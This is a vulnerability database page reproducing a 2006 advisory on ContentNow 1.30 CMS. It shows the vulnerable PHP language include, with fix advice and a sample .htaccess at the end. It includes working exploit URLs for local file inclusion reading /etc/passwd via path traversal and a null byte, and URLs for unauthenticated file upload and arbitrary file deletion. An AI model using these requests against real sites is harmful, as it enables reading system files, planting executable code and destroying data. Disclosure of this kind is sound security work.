Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

contentnow-130.txt

🗓️ 14 Nov 2006 00:00:00Reported by r0ut3rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities, Vendor: contentnow.mf4k.de, Discovered By: r0ut3r, Criticality: Highly critical, Local file inclusion, File Upload/Command Execution, File Removal Vulnerability, Fix with authentication, Quick Fix with .htacces

Code
`#####################################################################################  
# #  
# r0ut3r Presents... #  
# #  
# Another r0ut3r discovery! #  
# #  
# ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities #  
# #  
#####################################################################################  
# #  
# Software: ContentNow 1.30 Vulnerabilities #  
# #  
# Vendor: http://www.contentnow.mf4k.de/ #  
# #  
# Released: 2006/11/13 #  
# #  
# Discovered By: r0ut3r (writ3r [at] gmail.com) #  
# #  
# Criticality: Highly critical #  
# #  
#####################################################################################  
  
Local file inclusion vulnerability  
------------------------------------  
  
Vuln code:  
----------  
33 // get/set language  
34 $setLang= (empty ($_GET['lang'])) ? $cnCore->getBackendLanguage() : $_GET['lang'];  
35   
36 // define language  
37 include_once ('./language/'.$setLang.'.language.php');  
38 $lang= $cnLanguageArray[$setLang];  
  
Exploit:  
--------  
http://localhost/cn/edit.php?lang=../../../../etc/passwd%00  
http://localhost/cn/image.php?lang=../../../../etc/passwd%00  
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00  
Probably more, never checked all files.  
  
File Upload/Command Execution Vulnerability:  
---------------------------------------------  
Note: They tell you to set 777 permissions on install for certain folders.  
  
http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en  
set path to equal dir location:  
/ = root path  
  
Select file, then upload it.  
  
File Removal Vulnerability:  
----------------------------  
To delete files  
http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false  
set path to equal dir location:  
/ = root path  
set delfile for file you want to delete:  
q.php  
  
More Information:  
-----------------  
Email: writ3r [at] gmail.com  
  
Fix:  
-----  
How about some authentication?!  
Only allow the upload of certain files types, depends what you want it to use.  
  
As for local file includes, work out a better way to set languages, ie: make sure the language file included is required for the cms.  
  
Quick Fix:  
----------  
Setup .htaccess on cn/  
  
Example Fix:  
------------  
.htaccess:  
AuthName "ContentNow Fix!"  
AuthType Basic  
AuthUserFile /var/www/html/cn/.htpasswd  
Require valid-user  
  
This will prevent anyone from accessing this folder - this would be a solution for administrators whilst an upgrade, or patch is created.  
If you do want to access this better make a .htpasswd file to.   
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4
contentnow 1.30local file includearbitrary file uploadarbitrary file deleter0ut3rhighly criticalvendorvulnerabilitiesdiscovered byexploitsfile inclusioncommand executionfile removalauthentication.htaccess
23